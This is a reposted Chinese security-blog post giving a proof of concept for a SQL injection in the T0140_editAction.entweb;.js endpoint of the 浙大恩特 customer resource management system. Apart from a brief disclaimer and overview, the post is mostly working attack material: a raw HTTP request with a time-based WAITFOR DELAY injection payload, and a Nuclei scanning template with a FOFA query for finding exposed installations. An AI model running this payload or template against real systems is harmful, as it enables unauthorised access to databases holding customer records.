【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

admin 2023年11月21日15:27:55评论44 views字数 2383阅读7分56秒阅读模式

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

公众号新规只对常读星标的公众号才能展示大图推送,建议大家把公众号“night”设为

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

免责声明


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


night安全致力于分享技术学习和工具掌握。然而请注意不得将此用于任何未经授权的非法行为,请您严格遵守国家信息安全法律法规。任何违反法律、法规的行为,均与本人无关。如有侵权烦请告知,我们会立即删除并致歉。谢谢!


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

漏洞概述

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

浙大恩特客户资源管理系统中T0140_editAction.entweb;.js接口处存在SQL注入漏洞。


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

漏洞复现

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1';WAITFOR+DELAY+'0:0:10'-- HTTP/1.1Host: xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: closeCookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8CUpgrade-Insecure-Requests: 1

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

NUCLEI POC

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

poc本来随便写了一个,结果t00ls老哥帮忙改了一版,我就省事直接用用老哥的了

id: enter-T0140_editAction-api-sqli info:  name: 浙大恩特客户资源管理系统T0140_editAction.entweb;.js接口sql注入漏洞  author: YGnight  severity: high  description: description  reference:    - https://  metadata:    verified: true    max-request: 1    fofa-query: app="浙大恩特客户资源管理系统"  requests:  - raw:      - |+        GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1 HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate, br        Connection: close        Cookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8C        Upgrade-Insecure-Requests: 1
- |+ GET /entsoft/T0140_editAction.entweb;.js?method=getdocumentnumFlag&documentnum=1' HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Connection: close Cookie: JSESSIONID=1DAEEF5E703FF40871BD44A67C1EEDD5; JSESSIONID=2C6DAAA80F315B114CD65C9DA80D8D8C Upgrade-Insecure-Requests: 1
matchers-condition: and matchers: - type: dsl dsl: - "len(body_1)<3 && status_code_1==200 && contains(body_1, '0') && len(body_2)<3 && status_code_2==200 && contains(header_2, 'Content-Length: 0')"

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC


【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC



原文始发于微信公众号(night安全):【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月21日15:27:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】某客户资源管理系统T0140_editAction.entweb;.js接口SQL注入漏洞 附POChttps://cn-sec.com/archives/2218553.html

发表评论

匿名网友 填写信息